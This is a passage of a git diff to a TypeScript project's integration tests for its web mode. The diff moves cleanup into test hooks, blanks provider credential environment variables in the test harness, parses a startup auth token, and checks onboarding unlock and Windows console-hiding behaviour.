-    assert.match(launch.stderr, /status=started/, "expected a started diagnostic line on stderr")
-
-    const auth = runtimeAuthHeaders(launch)
-    await waitForHttpOk(`${launch.url}/api/boot`, undefined, auth)
-
-    // 1. Boot reports locked before any credentials are saved
-    const bootBefore = await fetch(`${launch.url}/api/boot`, {
-      method: "GET",
-      headers: { Accept: "application/json", ...auth },
-      signal: AbortSignal.timeout(10_000),
-    })
-    assert.equal(bootBefore.ok, true, `expected boot endpoint to respond successfully: ${bootBefore.status}`)
-    const bootBeforePayload = await bootBefore.json() as any
-    assert.equal(bootBeforePayload.onboarding.locked, true)
-    assert.equal(bootBeforePayload.onboarding.lockReason, "required_setup")
-
-    // 2. Invalid key → stays locked with failed validation
-    const invalidValidation = await fetch(`${launch.url}/api/onboarding`, {
-      method: "POST",
-      headers: { "Content-Type": "application/json", Accept: "application/json", ...auth },
-      body: JSON.stringify({ action: "save_api_key", providerId: "openai", apiKey: "invalid-demo-key" }),
-      signal: AbortSignal.timeout(10_000),
-    })
-    assert.equal(invalidValidation.status, 422)
-    const invalidPayload = await invalidValidation.json() as any
-    assert.equal(invalidPayload.onboarding.locked, true)
-    assert.equal(invalidPayload.onboarding.lastValidation.status, "failed")
-    assert.match(invalidPayload.onboarding.lastValidation.message ?? "", /rejected/i)
-
-    // 3. Valid key → unlocks
-    const validValidation = await fetch(`${launch.url}/api/onboarding`, {
-      method: "POST",
-      headers: { "Content-Type": "application/json", Accept: "application/json", ...auth },
-      body: JSON.stringify({ action: "save_api_key", providerId: "openai", apiKey: "valid-demo-key" }),
-      signal: AbortSignal.timeout(60_000),
-    })
-    assert.equal(validValidation.status, 200, `expected successful retry to unlock onboarding: ${validValidation.status}`)
-    const validPayload = await validValidation.json() as any
-    assert.equal(validPayload.onboarding.locked, false)
-    assert.equal(validPayload.onboarding.bridgeAuthRefresh.phase, "succeeded")
-
-    // 4. Boot confirms unlocked
-    const bootAfter = await fetch(`${launch.url}/api/boot`, {
-      method: "GET",
-      headers: { Accept: "application/json", ...auth },
-      signal: AbortSignal.timeout(10_000),
-    })
-    assert.equal(bootAfter.ok, true)
-    const bootAfterPayload = await bootAfter.json() as any
-    assert.equal(bootAfterPayload.onboarding.locked, false)
-    assert.equal(bootAfterPayload.onboarding.lockReason, null)
-  } finally {
+  t.after(async () => {
     if (port !== null) {
-      await killProcessOnPort(port)
+    await killProcessOnPort(port)
     }
     rmSync(tempRoot, { recursive: true, force: true })
-  }
+  });
+
+  const launch = await launchPackagedWebHost({
+    launchCwd: repoRoot,
+    tempHome,
+    browserLogPath,
+    env: {
+      GSD_WEB_TEST_FAKE_API_KEY_VALIDATION: "1",
+      ANTHROPIC_API_KEY: "",
+      OPENAI_API_KEY: "",
+      GOOGLE_API_KEY: "",
+    },
+  })
+  port = launch.port
+
+  assert.equal(launch.exitCode, 0, `expected the web launcher to exit cleanly:\n${launch.stderr}`)
+  assert.match(launch.stderr, /status=started/, "expected a started diagnostic line on stderr")
+
+  const auth = runtimeAuthHeaders(launch)
+  await waitForHttpOk(`${launch.url}/api/boot`, undefined, auth)
+
+  // 1. Boot reports locked before any credentials are saved
+  const bootBefore = await fetch(`${launch.url}/api/boot`, {
+    method: "GET",
+    headers: { Accept: "application/json", ...auth },
+    signal: AbortSignal.timeout(10_000),
+  })
+  assert.equal(bootBefore.ok, true, `expected boot endpoint to respond successfully: ${bootBefore.status}`)
+  const bootBeforePayload = await bootBefore.json() as any
+  assert.equal(bootBeforePayload.onboarding.locked, true)
+  assert.equal(bootBeforePayload.onboarding.lockReason, "required_setup")
+
+  // 2. Invalid key → stays locked with failed validation
+  const invalidValidation = await fetch(`${launch.url}/api/onboarding`, {
+    method: "POST",
+    headers: { "Content-Type": "application/json", Accept: "application/json", ...auth },
+    body: JSON.stringify({ action: "save_api_key", providerId: "openai", apiKey: "invalid-demo-key" }),
+    signal: AbortSignal.timeout(10_000),
+  })
+  assert.equal(invalidValidation.status, 422)
+  const invalidPayload = await invalidValidation.json() as any
+  assert.equal(invalidPayload.onboarding.locked, true)
+  assert.equal(invalidPayload.onboarding.lastValidation.status, "failed")
+  assert.match(invalidPayload.onboarding.lastValidation.message ?? "", /rejected/i)
+
+  // 3. Valid key → unlocks
+  const validValidation = await fetch(`${launch.url}/api/onboarding`, {
+    method: "POST",
+    headers: { "Content-Type": "application/json", Accept: "application/json", ...auth },
+    body: JSON.stringify({ action: "save_api_key", providerId: "openai", apiKey: "valid-demo-key" }),
+    signal: AbortSignal.timeout(60_000),
+  })
+  assert.equal(validValidation.status, 200, `expected successful retry to unlock onboarding: ${validValidation.status}`)
+  const validPayload = await validValidation.json() as any
+  assert.equal(validPayload.onboarding.locked, false)
+  assert.equal(validPayload.onboarding.bridgeAuthRefresh.phase, "succeeded")
+
+  // 4. Boot confirms unlocked
+  const bootAfter = await fetch(`${launch.url}/api/boot`, {
+    method: "GET",
+    headers: { Accept: "application/json", ...auth },
+    signal: AbortSignal.timeout(10_000),
+  })
+  assert.equal(bootAfter.ok, true)
+  const bootAfterPayload = await bootAfter.json() as any
+  assert.equal(bootAfterPayload.onboarding.locked, false)
+  assert.equal(bootAfterPayload.onboarding.lockReason, null)
 })
diff --git a/src/tests/integration/web-mode-runtime-harness.ts b/src/tests/integration/web-mode-runtime-harness.ts
index fed508e34..3083d6bc9 100644
--- a/src/tests/integration/web-mode-runtime-harness.ts
+++ b/src/tests/integration/web-mode-runtime-harness.ts
@@ -13,6 +13,52 @@ const packagedWebHostPath = join(projectRoot, "dist", "web", "standalone", "serv
 
 let runtimeArtifactsReady = false
 
+const SANITIZED_PROVIDER_ENV_KEYS = [
+  "ANTHROPIC_OAUTH_TOKEN",
+  "ANTHROPIC_API_KEY",
+  "OPENAI_API_KEY",
+  "AZURE_OPENAI_API_KEY",
+  "GEMINI_API_KEY",
+  "GROQ_API_KEY",
+  "CEREBRAS_API_KEY",
+  "XAI_API_KEY",
+  "OPENROUTER_API_KEY",
+  "AI_GATEWAY_API_KEY",
+  "ZAI_API_KEY",
+  "MISTRAL_API_KEY",
+  "MINIMAX_API_KEY",
+  "MINIMAX_CN_API_KEY",
+  "HF_TOKEN",
+  "OPENCODE_API_KEY",
+  "KIMI_API_KEY",
+  "ALIBABA_API_KEY",
+  "COPILOT_GITHUB_TOKEN",
+  "GH_TOKEN",
+  "GITHUB_TOKEN",
+  "GOOGLE_APPLICATION_CREDENTIALS",
+  "GOOGLE_CLOUD_PROJECT",
+  "GCLOUD_PROJECT",
+  "GOOGLE_CLOUD_LOCATION",
+  "AWS_PROFILE",
+  "AWS_ACCESS_KEY_ID",
+  "AWS_SECRET_ACCESS_KEY",
+  "AWS_BEARER_TOKEN_BEDROCK",
+  "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI",
+  "AWS_CONTAINER_CREDENTIALS_FULL_URI",
+  "AWS_WEB_IDENTITY_TOKEN_FILE",
+] as const
+
+function buildSanitizedRuntimeEnv(overrides?: NodeJS.ProcessEnv): NodeJS.ProcessEnv {
+  const env: NodeJS.ProcessEnv = { ...process.env }
+  for (const key of SANITIZED_PROVIDER_ENV_KEYS) {
+    env[key] = ""
+  }
+  return {
+    ...env,
+    ...overrides,
+  }
+}
+
 type RuntimeEndpoint = "boot" | "events"
 
 type RuntimeRequestDiagnostic = {
@@ -116,6 +162,11 @@ export function parseStartedUrl(stderr: string): string {
   return match[1]
 }
 
+function parseReadyAuthToken(stderr: string): string | null {
+  const match = stderr.match(/\[gsd\] Ready → http:\/\/[^\s]+\/#token=([a-f0-9]{64})/)
+  return match?.[1] ?? null
+}
+
 export async function launchPackagedWebHost(options: {
   launchCwd: string
   tempHome: string
@@ -142,12 +193,11 @@ export async function launchPackagedWebHost(options: {
       {
         cwd: options.launchCwd,
         env: {
-          ...process.env,
+          ...buildSanitizedRuntimeEnv(options.env),
           HOME: options.tempHome,
           PATH: `${fakeBin}:${process.env.PATH || ""}`,
           CI: "1",
           FORCE_COLOR: "0",
-          ...options.env,
         },
         stdio: ["ignore", "pipe", "pipe"],
       },
@@ -194,6 +244,9 @@ export async function launchPackagedWebHost(options: {
         } catch {
           // Non-fatal — tests that don't need the token can proceed without it
         }
+        if (!authToken) {
+          authToken = parseReadyAuthToken(stderr)
+        }
         finish({
           exitCode: code,
           stderr,
diff --git a/src/tests/integration/web-mode-windows-hide.test.ts b/src/tests/integration/web-mode-windows-hide.test.ts
new file mode 100644
index 000000000..aeb6baeea
--- /dev/null
+++ b/src/tests/integration/web-mode-windows-hide.test.ts
@@ -0,0 +1,120 @@
+import test from "node:test";
+import assert from "node:assert/strict";
+import { mkdirSync, mkdtempSync, rmSync, writeFileSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+const webMode = await import("../../web-mode.ts");
+
+// ---------------------------------------------------------------------------
+// #2628 — On Windows, child processes spawned by web-mode must set
+// `windowsHide: true` to prevent console windows from flashing on screen.
+// ---------------------------------------------------------------------------
+
+test("launchWebMode passes windowsHide: true in spawn options", async (t) => {
+  const tmp = mkdtempSync(join(tmpdir(), "gsd-web-winhide-"));
+  const standaloneRoot = join(tmp, "dist", "web", "standalone");
+  const serverPath = join(standaloneRoot, "server.js");
+  mkdirSync(standaloneRoot, { recursive: true });
+  writeFileSync(serverPath, 'console.log("stub")\n');
+
+  const pidFilePath = join(tmp, "web-server.pid");
+  const registryPath = join(tmp, "web-instances.json");
+
+  let capturedOptions: Record<string, unknown> | undefined;
+
+  t.after(() => {
+    rmSync(tmp, { recursive: true, force: true });
+  });
+
+  const status = await webMode.launchWebMode(
+    {
+      cwd: "/tmp/winhide-project",
+      projectSessionsDir: "/tmp/.gsd/sessions/winhide",
+      agentDir: "/tmp/.gsd/agent",
+      packageRoot: tmp,
+    },
+    {
+      initResources: () => {},
+      resolvePort: async () => 46000,
+      execPath: "/custom/node",
+      env: { TEST_ENV: "1" },
+      spawn: (_command, _args, options) => {
+        capturedOptions = options as Record<string, unknown>;
+        return {
+          pid: 70001,
+          once: () => undefined,
+          unref: () => {},
+        } as any;
+      },
+      waitForBootReady: async () => undefined,
+      openBrowser: () => {},
+      pidFilePath,
+      writePidFile: webMode.writePidFile,
+      registryPath,
+      stderr: { write: () => true },
+    },
+  );
+
+  assert.equal(status.ok, true, "launch should succeed");
+  assert.ok(capturedOptions, "spawn must have been called");
+  assert.equal(
+    capturedOptions!.windowsHide,
+    true,
+    "spawn options must include windowsHide: true to prevent console window flashing on Windows (#2628)",
+  );
+});
+
+test("launchWebMode source-dev host also passes windowsHide: true", async (t) => {
+  const tmp = mkdtempSync(join(tmpdir(), "gsd-web-winhide-src-"));
+  const webRoot = join(tmp, "web");
+  mkdirSync(webRoot, { recursive: true });
+  writeFileSync(join(webRoot, "package.json"), '{"name":"web"}\n');
+
+  const pidFilePath = join(tmp, "web-server.pid");
+  const registryPath = join(tmp, "web-instances.json");
+
+  let capturedOptions: Record<string, unknown> | undefined;
+
+  t.after(() => {
+    rmSync(tmp, { recursive: true, force: true });
+  });
+
+  const status = await webMode.launchWebMode(
+    {
+      cwd: "/tmp/winhide-src-project",
+      projectSessionsDir: "/tmp/.gsd/sessions/winhide-src",
+      agentDir: "/tmp/.gsd/agent",
+      packageRoot: tmp,
+    },
+    {
+      initResources: () => {},
+      resolvePort: async () => 46001,
+      execPath: "/custom/node",
+      env: { TEST_ENV: "1" },
+      platform: "win32",
+      spawn: (_command, _args, options) => {
+        capturedOptions = options as Record<string, unknown>;
+        return {
+          pid: 70002,
+          once: () => undefined,
+          unref: () => {},
+        } as any;
+      },
+      waitForBootReady: async () => undefined,
+      openBrowser: () => {},
+      pidFilePath,
+      writePidFile: webMode.writePidFile,
+      registryPath,
+      stderr: { write: () => true },
+    },
+  );
+
+  assert.equal(status.ok, true, "launch should succeed");
+  assert.ok(capturedOptions, "spawn must have been called");
+  assert.equal(
+    capturedOptions!.windowsHide,
+    true,
+    "source-dev spawn must also include windowsHide: true (#2628)",
+  );
+});
diff --git a/src/tests/web-multi-project-contract.test.ts b/src/tests/integration/web-multi-project-contract.test.ts
similarity index 67%
rename from src/tests/web-multi-project-contract.test.ts
rename to src/tests/integration/web-multi-project-contract.test.ts
index 25ac4e02d..4fa31c0ea 100644
--- a/src/tests/web-multi-project-contract.test.ts
+++ b/src/tests/integration/web-multi-project-contract.test.ts
@@ -8,7 +8,7 @@ import { PassThrough } from "node:stream";
 import { StringDecoder } from "node:string_decoder";
 
 const repoRoot = process.cwd();
-const bridge = await import("../web/bridge-service.ts");
+const bridge = await import("../../web/bridge-service.ts");
 
 // ---------------------------------------------------------------------------
 // Helpers (same shape as web-bridge-contract.test.ts)
@@ -230,7 +230,7 @@ function createHarness(sessionId: string) {
 // Tests — multi-project bridge coexistence
 // ---------------------------------------------------------------------------
 
-test("multi-project: getProjectBridgeServiceForCwd returns distinct instances for different project paths", async () => {
+test("multi-project: getProjectBridgeServiceForCwd returns distinct instances for different project paths", async (t) => {
   const fixtureA = makeWorkspaceFixture("A");
   const fixtureB = makeWorkspaceFixture("B");
 
@@ -247,23 +247,23 @@ test("multi-project: getProjectBridgeServiceForCwd returns distinct instances fo
     getOnboardingNeeded: () => false,
   });
 
-  try {
-    const bridgeA = bridge.getProjectBridgeServiceForCwd(fixtureA.projectCwd);
-    const bridgeB = bridge.getProjectBridgeServiceForCwd(fixtureB.projectCwd);
-    assert.notStrictEqual(bridgeA, bridgeB, "bridges for different paths must be distinct instances");
-
-    const snapA = bridgeA.getSnapshot();
-    const snapB = bridgeB.getSnapshot();
-    assert.equal(snapA.projectCwd, fixtureA.projectCwd);
-    assert.equal(snapB.projectCwd, fixtureB.projectCwd);
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests();
     fixtureA.cleanup();
     fixtureB.cleanup();
-  }
+  });
+
+  const bridgeA = bridge.getProjectBridgeServiceForCwd(fixtureA.projectCwd);
+  const bridgeB = bridge.getProjectBridgeServiceForCwd(fixtureB.projectCwd);
+  assert.notStrictEqual(bridgeA, bridgeB, "bridges for different paths must be distinct instances");
+
+  const snapA = bridgeA.getSnapshot();
+  const snapB = bridgeB.getSnapshot();
+  assert.equal(snapA.projectCwd, fixtureA.projectCwd);
+  assert.equal(snapB.projectCwd, fixtureB.projectCwd);
 });
 
-test("multi-project: getProjectBridgeServiceForCwd returns same instance for same path", async () => {
+test("multi-project: getProjectBridgeServiceForCwd returns same instance for same path", async (t) => {
   const fixtureA = makeWorkspaceFixture("idempotent");
 
   bridge.configureBridgeServiceForTests({
@@ -279,17 +279,17 @@ test("multi-project: getProjectBridgeServiceForCwd returns same instance for sam
     getOnboardingNeeded: () => false,
   });
 
-  try {
-    const first = bridge.getProjectBridgeServiceForCwd(fixtureA.projectCwd);
-    const second = bridge.getProjectBridgeServiceForCwd(fixtureA.projectCwd);
-    assert.strictEqual(first, second, "same path must return the same instance");
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests();
     fixtureA.cleanup();
-  }
+  });
+
+  const first = bridge.getProjectBridgeServiceForCwd(fixtureA.projectCwd);
+  const second = bridge.getProjectBridgeServiceForCwd(fixtureA.projectCwd);
+  assert.strictEqual(first, second, "same path must return the same instance");
 });
 
-test("multi-project: each bridge receives commands independently", async () => {
+test("multi-project: each bridge receives commands independently", async (t) => {
   const fixtureA = makeWorkspaceFixture("cmd-A");
   const fixtureB = makeWorkspaceFixture("cmd-B");
   const sessionPathA = createSessionFile(fixtureA.projectCwd, fixtureA.sessionsDir, "sess-A", "Session A");
@@ -320,43 +320,43 @@ test("multi-project: each bridge receives commands independently", async () => {
     getOnboardingNeeded: () => false,
   });
 
-  try {
-    const bridgeA = bridge.getProjectBridgeServiceForCwd(fixtureA.projectCwd);
-    const bridgeB = bridge.getProjectBridgeServiceForCwd(fixtureB.projectCwd);
-
-    // Start both bridges
-    await bridgeA.ensureStarted();
-    await bridgeB.ensureStarted();
-
-    // Send get_state to bridge A
-    const responseA = await bridgeA.sendInput({ type: "get_state" } as any);
-    assert.equal(responseA?.success, true);
-    assert.equal((responseA as any).data.sessionId, "sess-A");
-
-    // Send get_state to bridge B
-    const responseB = await bridgeB.sendInput({ type: "get_state" } as any);
-    assert.equal(responseB?.success, true);
-    assert.equal((responseB as any).data.sessionId, "sess-B");
-
-    // Each harness only got its own commands
-    assert.ok(harnessA.commands.length >= 1, "harness A received commands");
-    assert.ok(harnessB.commands.length >= 1, "harness B received commands");
-    assert.ok(
-      harnessA.commands.every((c: any) => c.type === "get_state"),
-      "harness A only got get_state commands",
-    );
-    assert.ok(
-      harnessB.commands.every((c: any) => c.type === "get_state"),
-      "harness B only got get_state commands",
-    );
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests();
     fixtureA.cleanup();
     fixtureB.cleanup();
-  }
+  });
+
+  const bridgeA = bridge.getProjectBridgeServiceForCwd(fixtureA.projectCwd);
+  const bridgeB = bridge.getProjectBridgeServiceForCwd(fixtureB.projectCwd);
+
+  // Start both bridges
+  await bridgeA.ensureStarted();
+  await bridgeB.ensureStarted();
+
+  // Send get_state to bridge A
+  const responseA = await bridgeA.sendInput({ type: "get_state" } as any);
+  assert.equal(responseA?.success, true);
+  assert.equal((responseA as any).data.sessionId, "sess-A");
+
+  // Send get_state to bridge B
+  const responseB = await bridgeB.sendInput({ type: "get_state" } as any);
+  assert.equal(responseB?.success, true);
+  assert.equal((responseB as any).data.sessionId, "sess-B");
+
+  // Each harness only got its own commands
+  assert.ok(harnessA.commands.length >= 1, "harness A received commands");
+  assert.ok(harnessB.commands.length >= 1, "harness B received commands");
+  assert.ok(
+    harnessA.commands.every((c: any) => c.type === "get_state"),
+    "harness A only got get_state commands",
+  );
+  assert.ok(
+    harnessB.commands.every((c: any) => c.type === "get_state"),
+    "harness B only got get_state commands",
+  );
 });
 
-test("multi-project: SSE subscribers are isolated per bridge", async () => {
+test("multi-project: SSE subscribers are isolated per bridge", async (t) => {
   const fixtureA = makeWorkspaceFixture("sse-A");
   const fixtureB = makeWorkspaceFixture("sse-B");
 
@@ -375,52 +375,52 @@ test("multi-project: SSE subscribers are isolated per bridge", async () => {
     getOnboardingNeeded: () => false,
   });
 
-  try {
-    const bridgeA = bridge.getProjectBridgeServiceForCwd(fixtureA.projectCwd);
-    const bridgeB = bridge.getProjectBridgeServiceForCwd(fixtureB.projectCwd);
-
-    const eventsA: any[] = [];
-    const eventsB: any[] = [];
-
-    const unsubA = bridgeA.subscribe((event) => eventsA.push(event));
-    const unsubB = bridgeB.subscribe((event) => eventsB.push(event));
-
-    // Subscribe fires an initial bridge_status event for each
-    const initialA = eventsA.length;
-    const initialB = eventsB.length;
-
-    // Start bridge A so it has a child process
-    await bridgeA.ensureStarted();
-    await waitForMicrotasks();
-
-    // Filter to only non-bridge_status events that we emit manually
-    const agentEventsA: any[] = [];
-    const agentEventsB: any[] = [];
-
-    const unsubA2 = bridgeA.subscribe((event) => {
-      if (event.type !== "bridge_status") agentEventsA.push(event);
-    });
-    const unsubB2 = bridgeB.subscribe((event) => {
-      if (event.type !== "bridge_status") agentEventsB.push(event);
-    });
-
-    // Emit an agent event on bridge A's child process
-    harnessA.emit({ type: "agent_start" });
-    await waitForMicrotasks();
-
-    // Bridge A's subscriber should see it; bridge B's should not
-    assert.ok(agentEventsA.length > 0, "bridge A subscriber should see agent_start");
-    assert.equal(agentEventsB.length, 0, "bridge B subscriber should NOT see events from bridge A");
-
-    unsubA();
-    unsubB();
-    unsubA2();
-    unsubB2();
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests();
     fixtureA.cleanup();
     fixtureB.cleanup();
-  }
+  });
+
+  const bridgeA = bridge.getProjectBridgeServiceForCwd(fixtureA.projectCwd);
+  const bridgeB = bridge.getProjectBridgeServiceForCwd(fixtureB.projectCwd);
+
+  const eventsA: any[] = [];
+  const eventsB: any[] = [];
+
+  const unsubA = bridgeA.subscribe((event) => eventsA.push(event));
+  const unsubB = bridgeB.subscribe((event) => eventsB.push(event));
+
+  // Subscribe fires an initial bridge_status event for each
+  const initialA = eventsA.length;
+  const initialB = eventsB.length;
+
+  // Start bridge A so it has a child process
+  await bridgeA.ensureStarted();
+  await waitForMicrotasks();
+
+  // Filter to only non-bridge_status events that we emit manually
+  const agentEventsA: any[] = [];
+  const agentEventsB: any[] = [];
+
+  const unsubA2 = bridgeA.subscribe((event) => {
+    if (event.type !== "bridge_status") agentEventsA.push(event);
+  });
+  const unsubB2 = bridgeB.subscribe((event) => {
+    if (event.type !== "bridge_status") agentEventsB.push(event);
+  });
+
+  // Emit an agent event on bridge A's child process
+  harnessA.emit({ type: "agent_start" });
+  await waitForMicrotasks();
+
+  // Bridge A's subscriber should see it; bridge B's should not
+  assert.ok(agentEventsA.length > 0, "bridge A subscriber should see agent_start");
+  assert.equal(agentEventsB.length, 0, "bridge B subscriber should NOT see events from bridge A");
+
+  unsubA();
+  unsubB();
+  unsubA2();
+  unsubB2();
 });
 
 test("multi-project: resolveProjectCwd reads ?project= from request URL", () => {
@@ -430,7 +430,7 @@ test("multi-project: resolveProjectCwd reads ?project= from request URL", () =>
   assert.equal(result, "/tmp/my-project");
 });
 
-test("multi-project: resolveProjectCwd falls back to GSD_WEB_PROJECT_CWD when no ?project= present", () => {
+test("multi-project: resolveProjectCwd falls back to GSD_WEB_PROJECT_CWD when no ?project= present", (t) => {
   bridge.configureBridgeServiceForTests({
     env: {
       ...process.env,
@@ -443,17 +443,15 @@ test("multi-project: resolveProjectCwd falls back to GSD_WEB_PROJECT_CWD when no
     getOnboardingNeeded: () => false,
   });
 
-  try {
-    const result = bridge.resolveProjectCwd(
-      new Request("http://localhost/api/boot"),
-    );
-    assert.equal(result, "/fallback/path");
-  } finally {
-    bridge.configureBridgeServiceForTests(null);
-  }
+  t.after(() => { bridge.configureBridgeServiceForTests(null); });
+
+  const result = bridge.resolveProjectCwd(
+    new Request("http://localhost/api/boot"),
+  );
+  assert.equal(result, "/fallback/path");
 });
 
-test("multi-project: getProjectBridgeService backward compat shim works", async () => {
+test("multi-project: getProjectBridgeService backward compat shim works", async (t) => {
   const fixture = makeWorkspaceFixture("compat");
   const harness = createHarness("sess-compat");
 
@@ -470,23 +468,23 @@ test("multi-project: getProjectBridgeService backward compat shim works", async
     getOnboardingNeeded: () => false,
   });
 
-  try {
-    const service = bridge.getProjectBridgeService();
-    assert.ok(service, "getProjectBridgeService() should return a BridgeService");
-    const snapshot = service.getSnapshot();
-    assert.equal(snapshot.projectCwd, fixture.projectCwd, "backward compat shim should use env-resolved projectCwd");
-    assert.equal(snapshot.phase, "idle");
-
-    // Same instance as getProjectBridgeServiceForCwd with the same path
-    const directService = bridge.getProjectBridgeServiceForCwd(fixture.projectCwd);
-    assert.strictEqual(service, directService, "backward compat shim should return same instance as direct lookup");
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests();
     fixture.cleanup();
-  }
+  });
+
+  const service = bridge.getProjectBridgeService();
+  assert.ok(service, "getProjectBridgeService() should return a BridgeService");
+  const snapshot = service.getSnapshot();
+  assert.equal(snapshot.projectCwd, fixture.projectCwd, "backward compat shim should use env-resolved projectCwd");
+  assert.equal(snapshot.phase, "idle");
+
+  // Same instance as getProjectBridgeServiceForCwd with the same path
+  const directService = bridge.getProjectBridgeServiceForCwd(fixture.projectCwd);
+  assert.strictEqual(service, directService, "backward compat shim should return same instance as direct lookup");
 });
 
-test("multi-project: resetBridgeServiceForTests clears all registry entries", async () => {
+test("multi-project: resetBridgeServiceForTests clears all registry entries", async (t) => {
   const fixtureA = makeWorkspaceFixture("reset-A");
   const fixtureB = makeWorkspaceFixture("reset-B");
 
@@ -503,38 +501,38 @@ test("multi-project: resetBridgeServiceForTests clears all registry entries", as
     getOnboardingNeeded: () => false,
   });
 
-  try {
-    // Create two bridge instances
-    const beforeA = bridge.getProjectBridgeServiceForCwd(fixtureA.projectCwd);
-    const beforeB = bridge.getProjectBridgeServiceForCwd(fixtureB.projectCwd);
-    assert.notStrictEqual(beforeA, beforeB);
-
-    // Reset clears the registry
-    await bridge.resetBridgeServiceForTests();
-
-    // Re-configure after reset (reset clears overrides too)
-    bridge.configureBridgeServiceForTests({
-      env: {
-        ...process.env,
-        GSD_WEB_PROJECT_CWD: fixtureA.projectCwd,
-        GSD_WEB_PROJECT_SESSIONS_DIR: fixtureA.sessionsDir,
-        GSD_WEB_PACKAGE_ROOT: repoRoot,
-      },
-      spawn: createHarness("unused").spawn,
-      indexWorkspace: async () => fakeWorkspaceIndex(),
-      getAutoDashboardData: () => fakeAutoDashboardData(),
-      getOnboardingNeeded: () => false,
-    });
-
-    // Should get new instances
-    const afterA = bridge.getProjectBridgeServiceForCwd(fixtureA.projectCwd);
-    const afterB = bridge.getProjectBridgeServiceForCwd(fixtureB.projectCwd);
-    assert.notStrictEqual(afterA, beforeA, "reset must create fresh instances for path A");
-    assert.notStrictEqual(afterB, beforeB, "reset must create fresh instances for path B");
-    assert.notStrictEqual(afterA, afterB, "new instances should still be distinct");
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests();
     fixtureA.cleanup();
     fixtureB.cleanup();
-  }
+  });
+
+  // Create two bridge instances
+  const beforeA = bridge.getProjectBridgeServiceForCwd(fixtureA.projectCwd);
+  const beforeB = bridge.getProjectBridgeServiceForCwd(fixtureB.projectCwd);
+  assert.notStrictEqual(beforeA, beforeB);
+
+  // Reset clears the registry
+  await bridge.resetBridgeServiceForTests();
+
+  // Re-configure after reset (reset clears overrides too)
+  bridge.configureBridgeServiceForTests({
+    env: {
+      ...process.env,
+      GSD_WEB_PROJECT_CWD: fixtureA.projectCwd,
+      GSD_WEB_PROJECT_SESSIONS_DIR: fixtureA.sessionsDir,
+      GSD_WEB_PACKAGE_ROOT: repoRoot,
+    },
+    spawn: createHarness("unused").spawn,
+    indexWorkspace: async () => fakeWorkspaceIndex(),
+    getAutoDashboardData: () => fakeAutoDashboardData(),
+    getOnboardingNeeded: () => false,
+  });
+
+  // Should get new instances
+  const afterA = bridge.getProjectBridgeServiceForCwd(fixtureA.projectCwd);
+  const afterB = bridge.getProjectBridgeServiceForCwd(fixtureB.projectCwd);
+  assert.notStrictEqual(afterA, beforeA, "reset must create fresh instances for path A");
+  assert.notStrictEqual(afterB, beforeB, "reset must create fresh instances for path B");
+  assert.notStrictEqual(afterA, afterB, "new instances should still be distinct");
 });
diff --git a/src/tests/integration/web-onboarding-contract.test.ts b/src/tests/integration/web-onboarding-contract.test.ts
new file mode 100644
index 000000000..3ed833368
--- /dev/null
+++ b/src/tests/integration/web-onboarding-contract.test.ts
@@ -0,0 +1,693 @@
+import test from "node:test";
+import assert from "node:assert/strict";
+import { EventEmitter } from "node:events";
+import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+import { PassThrough } from "node:stream";
+import { StringDecoder } from "node:string_decoder";
+
+const repoRoot = process.cwd();
+const bridge = await import("../../web/bridge-service.ts");
+const onboarding = await import("../../web/onboarding-service.ts");
+const bootRoute = await import("../../../web/app/api/boot/route.ts");
+const onboardingRoute = await import("../../../web/app/api/onboarding/route.ts");
+const commandRoute = await import("../../../web/app/api/session/command/route.ts");
+const { AuthStorage } = await import("@gsd/pi-coding-agent");
+
+const ONBOARDING_ENV_KEYS = [
+  "GITHUB_TOKEN",
+  "GH_TOKEN",
+  "COPILOT_GITHUB_TOKEN",
+  "ANTHROPIC_OAUTH_TOKEN",
+  "ANTHROPIC_API_KEY",
+  "OPENAI_API_KEY",
+  "AZURE_OPENAI_API_KEY",
+  "GEMINI_API_KEY",
+  "GOOGLE_APPLICATION_CREDENTIALS",
+  "GOOGLE_CLOUD_PROJECT",
+  "GCLOUD_PROJECT",
+  "GOOGLE_CLOUD_LOCATION",
+  "GROQ_API_KEY",
+  "CEREBRAS_API_KEY",
+  "XAI_API_KEY",
+  "OPENROUTER_API_KEY",
+  "AI_GATEWAY_API_KEY",
+  "ZAI_API_KEY",
+  "MISTRAL_API_KEY",
+  "MINIMAX_API_KEY",
+  "MINIMAX_CN_API_KEY",
+  "HF_TOKEN",
+  "OPENCODE_API_KEY",
+  "KIMI_API_KEY",
+  "ALIBABA_API_KEY",
+  "AWS_PROFILE",
+  "AWS_ACCESS_KEY_ID",
+  "AWS_SECRET_ACCESS_KEY",
+  "AWS_BEARER_TOKEN_BEDROCK",
+  "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI",
+  "AWS_CONTAINER_CREDENTIALS_FULL_URI",
+  "AWS_WEB_IDENTITY_TOKEN_FILE",
+] as const;
+
+const ORIGINAL_ONBOARDING_ENV = Object.fromEntries(
+  ONBOARDING_ENV_KEYS.map((key) => [key, process.env[key]]),
+) as Record<(typeof ONBOARDING_ENV_KEYS)[number], string | undefined>;
+
+function clearOnboardingEnv(): void {
+  for (const key of ONBOARDING_ENV_KEYS) {
+    delete process.env[key];
+  }
+}
+
+function restoreOnboardingEnv(): void {
+  for (const key of ONBOARDING_ENV_KEYS) {
+    const value = ORIGINAL_ONBOARDING_ENV[key];
+    if (value === undefined) delete process.env[key];
+    else process.env[key] = value;
+  }
+}
+
+class FakeRpcChild extends EventEmitter {
+  stdin = new PassThrough();
+  stdout = new PassThrough();
+  stderr = new PassThrough();
+  exitCode: number | null = null;
+
+  kill(signal: NodeJS.Signals = "SIGTERM"): boolean {
+    if (this.exitCode === null) {
+      this.exitCode = 0;
+    }
+    queueMicrotask(() => {
+      this.emit("exit", this.exitCode, signal);
+    });
+    return true;
+  }
+}
+
+function serializeJsonLine(value: unknown): string {
+  return `${JSON.stringify(value)}\n`;
+}
+
+function attachJsonLineReader(stream: PassThrough, onLine: (line: string) => void): void {
+  const decoder = new StringDecoder("utf8");
